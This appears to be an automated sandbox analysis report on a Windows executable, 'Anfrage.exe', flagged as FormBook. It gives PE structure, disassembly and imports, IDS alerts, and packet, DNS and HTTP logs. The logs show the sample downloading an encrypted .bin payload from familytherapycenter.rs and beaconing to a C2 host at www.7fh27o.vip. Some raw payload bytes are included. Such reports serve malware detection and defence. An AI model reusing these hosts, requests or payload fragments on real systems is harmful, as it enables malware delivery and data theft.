                                                                        SSDEEP:24576:5CAoDyk/vnt3h1CzLuTIvjb053uAY/lxSlge7w6/tBYPeuHdB4bU4VD4T:5CAfqvtx1UuTI7b82llQfIWuHHSU4VDq
                                                                        TLSH:3A45124277760EA5E85984F79266CD347F63BC7B014006EB325CFB1A4AB63F0452B63A
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...|.....
                                                                        Icon Hash:076d76bb4c713307
                                                                        Entrypoint:0x4031a3
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=Testaceous, O=Testaceous, L=Barrasford, C=GB
                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                        Error Number:-2146762487
                                                                        Not Before, Not After
                                                                        • 06/04/2024 11:43:32 06/04/2027 11:43:32
                                                                        Subject Chain
                                                                        • CN=Testaceous, O=Testaceous, L=Barrasford, C=GB
                                                                        Version:3
                                                                        Thumbprint MD5:A88F8D93DF4B32C3100DB6EF0B28E632
                                                                        Thumbprint SHA-1:01B3F6D5BCACC2E65D0EA80030911353974B0020
                                                                        Thumbprint SHA-256:3E09325D6D6531EC211596912CFD7F18EDCF1743A1245B99446C72726BBE3F3D
                                                                        Serial:04B33E16D2845ED588789A6EB5537D3B893D640E
                                                                        Instruction
                                                                        sub esp, 00000184h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor ebx, ebx
                                                                        push 00008001h
                                                                        mov dword ptr [esp+18h], ebx
                                                                        mov dword ptr [esp+10h], 0040A198h
                                                                        mov dword ptr [esp+20h], ebx
                                                                        mov byte ptr [esp+14h], 00000020h
                                                                        call dword ptr [004080A8h]
                                                                        call dword ptr [004080A4h]
                                                                        cmp ax, 00000006h
                                                                        je 00007F03D47E7C03h
                                                                        push ebx
                                                                        call 00007F03D47EAB71h
                                                                        cmp eax, ebx
                                                                        je 00007F03D47E7BF9h
                                                                        push 00000C00h
                                                                        call eax
                                                                        mov esi, 00408298h
                                                                        push esi
                                                                        call 00007F03D47EAAEDh
                                                                        push esi
                                                                        call dword ptr [004080A0h]
                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                        cmp byte ptr [esi], bl
                                                                        jne 00007F03D47E7BDDh
                                                                        push ebp
                                                                        push 00000009h
                                                                        call 00007F03D47EAB44h
                                                                        push 00000007h
                                                                        call 00007F03D47EAB3Dh
                                                                        mov dword ptr [0042F404h], eax
                                                                        call dword ptr [00408044h]
                                                                        push ebx
                                                                        call dword ptr [00408288h]
                                                                        mov dword ptr [0042F4B8h], eax
                                                                        push ebx
                                                                        lea eax, dword ptr [esp+38h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push ebx
                                                                        push 00429828h
                                                                        call dword ptr [00408174h]
                                                                        push 0040A188h
                                                                        push 0042EC00h
                                                                        call 00007F03D47EA767h
                                                                        call dword ptr [0040809Ch]
                                                                        mov ebp, 00435000h
                                                                        push eax
                                                                        push ebp
                                                                        call 00007F03D47EA755h
                                                                        push ebx
                                                                        call dword ptr [00408154h]
                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8534 | 0xa0 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4b000 | 0x64f00 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x12f5f0 | 0x22d0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        .text | 0x1000 | 0x6071 | 0x6200 | 86ec2a2da0012903b23e33f511180572 | False | 0.6687659438775511 | data | 6.434342820031866 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata | 0x8000 | 0x1352 | 0x1400 | cd090b7c5bd9ae3da2a43d4f02ef98b7 | False | 0.4599609375 | data | 5.237297010093776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data | 0xa000 | 0x254f8 | 0x600 | e98382d1559cdefaafaf45200fe1faf0 | False | 0.4544270833333333 | data | 4.037252180314336 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .ndata | 0x30000 | 0x1b000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc | 0x4b000 | 0x64f00 | 0x65000 | 4b35ddad0638afdc14d8651f31f9f72e | False | 0.5893022896039604 | data | 6.144636705094013 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                        RT_BITMAP | 0x4b400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
                                                                        RT_ICON | 0x4b768 | 0x4180c | Device independent bitmap graphic, 255 x 510 x 32, image size 260100 | English | United States | 0.5566530003727171
                                                                        RT_ICON | 0x8cf78 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.6340796167041287
                                                                        RT_ICON | 0x9d7a0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.6664652091654404
                                                                        RT_ICON | 0xa6c48 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.6956188001889466
                                                                        RT_ICON | 0xaae70 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.6902489626556016
                                                                        RT_ICON | 0xad418 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.724437148217636
                                                                        RT_ICON | 0xae4c0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.7479508196721312
                                                                        RT_ICON | 0xaee48 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.799645390070922
                                                                        RT_DIALOG | 0xaf2b0 | 0x144 | data | English | United States | 0.5216049382716049
                                                                        RT_DIALOG | 0xaf3f8 | 0x13c | data | English | United States | 0.5506329113924051
                                                                        RT_DIALOG | 0xaf538 | 0x100 | data | English | United States | 0.5234375
                                                                        RT_DIALOG | 0xaf638 | 0x11c | data | English | United States | 0.6091549295774648
                                                                        RT_DIALOG | 0xaf758 | 0xc4 | data | English | United States | 0.5918367346938775
                                                                        RT_DIALOG | 0xaf820 | 0x60 | data | English | United States | 0.7291666666666666
                                                                        RT_GROUP_ICON | 0xaf880 | 0x76 | data | English | United States | 0.7457627118644068
                                                                        RT_VERSION | 0xaf8f8 | 0x2c8 | data | English | United States | 0.5084269662921348
                                                                        RT_MANIFEST | 0xafbc0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                                        DLL | Import
                                                                        KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                        USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                        GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                        SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                        ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                        COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                        ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                        Language of compilation system | Country where language is spoken
                                                                        English | United States
                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                        2024-11-11T12:03:35.896385+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.175.87.197 | 443 | 192.168.2.8 | 49705 | TCP
                                                                        2024-11-11T12:04:13.973164+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.8 | 49711 | TCP
                                                                        2024-11-11T12:04:37.711666+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49713 | 188.40.95.144 | 443 | TCP
                                                                        2024-11-11T12:05:16.864867+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | TCP
                                                                        2024-11-11T12:05:16.864867+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | TCP
                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Nov 11, 2024 12:04:37.964701891 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964731932 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964787006 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964813948 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964838028 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.964919090 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.964946985 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.965019941 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.965056896 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.965123892 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.965153933 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.965224981 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.969737053 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.969830036 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.969856024 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.969934940 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970431089 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970504999 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970524073 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970590115 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970710039 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970783949 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.970804930 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.970879078 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.971492052 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.971570015 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.972134113 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.972203970 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.972230911 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.972296953 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:37.972711086 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:37.972800016 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.006541967 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.006699085 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047262907 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047369003 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047439098 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047522068 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047559023 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047665119 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.047915936 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.047993898 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.048037052 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.048101902 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.048113108 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.048162937 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.048214912 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.048264980 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.059905052 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.059925079 CET44349713188.40.95.144192.168.2.8
                                                                        Nov 11, 2024 12:04:38.059997082 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:04:38.060030937 CET49713443192.168.2.8188.40.95.144
                                                                        Nov 11, 2024 12:05:16.426477909 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.431441069 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.431562901 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.439150095 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.444019079 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.863430023 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.864773989 CET80497163.33.130.190192.168.2.8
                                                                        Nov 11, 2024 12:05:16.864866972 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.866852999 CET4971680192.168.2.83.33.130.190
                                                                        Nov 11, 2024 12:05:16.871660948 CET80497163.33.130.190192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 11, 2024 12:04:36.647671938 CET | 50355 | 53 | 192.168.2.8 | 1.1.1.1
Nov 11, 2024 12:04:36.851331949 CET | 53 | 50355 | 1.1.1.1 | 192.168.2.8
Nov 11, 2024 12:05:16.405495882 CET | 53599 | 53 | 192.168.2.8 | 1.1.1.1
Nov 11, 2024 12:05:16.418987036 CET | 53 | 53599 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 11, 2024 12:04:36.647671938 CET | 192.168.2.8 | 1.1.1.1 | 0x7ca | Standard query (0) | familytherapycenter.rs | A (IP address) | IN (0x0001) | false
Nov 11, 2024 12:05:16.405495882 CET | 192.168.2.8 | 1.1.1.1 | 0x2c6c | Standard query (0) | www.7fh27o.vip | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 11, 2024 12:04:36.851331949 CET | 1.1.1.1 | 192.168.2.8 | 0x7ca | No error (0) | familytherapycenter.rs | | 188.40.95.144 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 12:05:16.418987036 CET | 1.1.1.1 | 192.168.2.8 | 0x2c6c | No error (0) | www.7fh27o.vip | 7fh27o.vip | | CNAME (Canonical name) | IN (0x0001) | false
Nov 11, 2024 12:05:16.418987036 CET | 1.1.1.1 | 192.168.2.8 | 0x2c6c | No error (0) | 7fh27o.vip | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 11, 2024 12:05:16.418987036 CET | 1.1.1.1 | 192.168.2.8 | 0x2c6c | No error (0) | 7fh27o.vip | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
• familytherapycenter.rs
• www.7fh27o.vip
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49716 | 3.33.130.190 | 80 | 2220 | C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 12:05:16.439150095 CET | 550 | OUT | GET /wevl/?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.7fh27o.vip
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; LGL39C Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Nov 11, 2024 12:05:16.863430023 CET | 412 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 11 Nov 2024 11:05:16 GMT
Content-Type: text/html
Content-Length: 272
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 64 53 64 67 3d 75 54 77 4c 79 7a 6e 70 54 48 4e 68 26 4c 48 78 44 66 3d 6c 62 66 37 6a 39 58 6a 6c 41 5a 70 64 36 41 33 55 70 4e 79 74 33 4e 49 36 2b 33 34 43 56 68 6d 54 31 74 45 50 30 6f 33 61 57 4a 4f 59 52 77 70 6c 54 49 56 32 50 70 63 68 55 2b 38 65 4e 72 66 41 4d 41 31 51 72 38 4d 6a 72 4b 53 6b 6e 73 78 4c 56 41 4b 33 7a 41 48 53 6e 41 2f 46 37 4d 55 6b 67 52 52 6e 6f 52 6c 52 56 4b 67 62 6e 72 55 78 70 6a 50 2b 30 65 76 49 79 76 46 6d 35 4a 45 68 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49713 | 188.40.95.144 | 443 | 8048 | C:\Users\user\Desktop\Anfrage.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 11:04:37 UTC | 194 | OUT | GET /JWXOdIrgRlshLWuPJxOk219.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: familytherapycenter.rs
Cache-Control: no-cache
2024-11-11 11:04:37 UTC | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 11:04:37 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 06 Nov 2024 13:59:50 GMT
Accept-Ranges: bytes
Content-Length: 289344
Cache-Control: max-age=172800
Expires: Wed, 13 Nov 2024 11:04:37 GMT
Content-Type: application/octet-stream
2024-11-11 11:04:37 UTC | 7872 | IN | Data Raw: 1f 39 62 92 ed cf 66 3c be f2 a1 1f a8 80 13 9d cf 32 19 43 30 77 c0 e6 a8 c1 ea 02 e0 73 1d 22 14 f2 49 cd 7f 21 d3 2a cd 93 3a c6 6f 01 9b 1d 49 2d a8 49 39 45 b1 1e 9f e3 64 5d 53 da b7 e5 e2 08 c8 fe dc 13 5d 9b 6d 3a 37 c8 1d b8 8b 81 86 6e 94 89 35 29 e9 c0 2f ad 6c 0a e8 38 25 1c 88 3f 96 fe 92 71 94 24 a6 bc 20 c2 67 62 86 5d 43 75 24 0d f8 50 41 ef 19 3b df 86 eb a3 a8 1c c1 e0 10 2f 44 65 ce 82 83 dc 2e cd b9 2a 4b 53 86 6a c4 b4 44 3b 3c 6b a2 10 f4 93 c6 1a ec 0f 50 ea ae 7d e0 e2 b9 d4 56 30 5a 76 7a f3 fc e5 dd 9a 3c 56 76 9f 04 91 73 59 cd e8 70 71 0b 28 1a 50 03 0f dd bd 1a fa 17 13 4d 11 1b 5e b5 93 c7 e2 74 75 fe 17 8e 07 87 c4 32 69 ee 6f f3 53 40 1b eb c7 53 16 56 c4 f8 f8 34 23 9d 68 7f e8 68 70 f6 ca 95 e2 97 f6 b8 fc 1a 74 63 11 49
Data Ascii: 9bf<2C0ws"I!*:oI-I9Ed]S]m:7n5)/l8%?q$ gb]Cu$PA;/De.*KSjD;<kP}V0Zvz<VvsYpq(PM^tu2ioS@SV4#hhptcI
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: 2f 5f 54 35 5a 9d 08 64 7c b7 18 96 56 94 3a 68 c9 2c b8 53 4e eb c8 c9 d7 42 47 87 53 1a a0 7d 86 f2 38 56 1d f1 16 9b 86 77 61 8e 9c 1f 7c 10 11 0e f1 5c 92 7b a5 fd 4c 94 40 b0 18 3f 3d ba 81 04 7c 92 0e 4a e9 ad a4 c5 ae 4b 48 32 a9 57 10 c0 d8 40 d2 64 5b 82 5b ad e4 10 14 ba 34 8b 01 b2 59 a6 da 8c c7 37 d2 59 c1 36 1f 37 28 7b e2 40 d7 6f 99 1a 6c 57 d1 4f ff 2d 21 f1 ef d0 28 0f 54 cb 88 38 aa 27 2f aa 0d 59 3f cf 53 7d e3 4e c2 c1 98 d0 3b 68 bd c5 67 c5 60 13 66 93 ad 5d 57 75 64 9a af 6b 8a a0 b2 a4 af d6 96 27 ea c4 03 94 de d6 eb 72 5c f2 51 f8 36 cd 84 bc 9d bb 0e a5 a0 e3 ae 67 25 3f 96 66 c2 e0 36 ec 83 a1 dc 1b 2e d6 fb 55 42 09 fd 1c d2 62 71 fa 73 6e 8d 0b 8c f4 a0 61 f5 cd f0 a6 88 90 a8 18 ea 46 df ae c9 77 a2 d4 d1 62 0c e4 59 22 b2
Data Ascii: /_T5Zd|V:h,SNBGS}8Vwa|\{L@?=|JKH2W@d[[4Y7Y67({@olWO-!(T8'/Y?S}N;hg`f]Wudk'r\Q6g%?f6.UBbqsnaFwbY"
2024-11-11 11:04:37 UTC | 8000 | IN | Data Raw: 13 c0 c3 5f 76 26 72 ce 20 1a be 96 b7 19 5f 51 40 fe ad 2b 80 43 ba d2 a8 cd 8f ab 49 5f 22 50 30 30 26 30 83 aa 69 b8 52 f2 d1 d7 bc 4a 61 df 69 a9 e2 da ff 64 79 f1 20 05 6b 27 4c 15 a4 de 77 2d e2 2f fd 11 ed b9 5d 7c 7a 0d 65 7d 9a 7d 61 09 8a ee c3 56 f9 3e 9a ab f3 ad 90 fc 84 a4 aa 37 fb 2d 30 ea f5 1a 00 03 1c 88 58 3c f3 53 f3 bc 3f 77 c4 92 51 a5 5b d9 f6 a1 50 2b c2 62 fb 39 3d 61 e6 e5 25 ef d0 b4 58 72 03 13 23 e4 b1 5a 64 4c 15 c4 73 16 3d 46 54 75 79 13 a8 bf 7d c6 29 c3 e8 4b c2 8d 07 62 95 36 8c 72 7b 5f 94 7f 6e 27 b2 bb b0 ba 5b fd ef 37 6a 40 19 fd 47 3b de a3 b2 f8 fd 0a 67 74 6f 42 e2 e0 0c c6 2b 52 0a c3 8a 1a a2 38 48 a8 9b a6 2c 87 8c 43 bc d4 f8 9a 27 6e 72 e7 76 d3 2c 77 b0 a4 46 0d e6 96 67 b8 48 63 19 07 a6 2c ed ca 5e 8b f4
Data Ascii: _v&r _Q@+CI_"P00&0iRJaidy k'Lw-/]|ze}}aV>7-0X<S?wQ[P+b9=a%Xr#ZdLs=FTuy})Kb6r{_n'[7j@G;gtoB+R8H,C'nrv,wFgHc,^
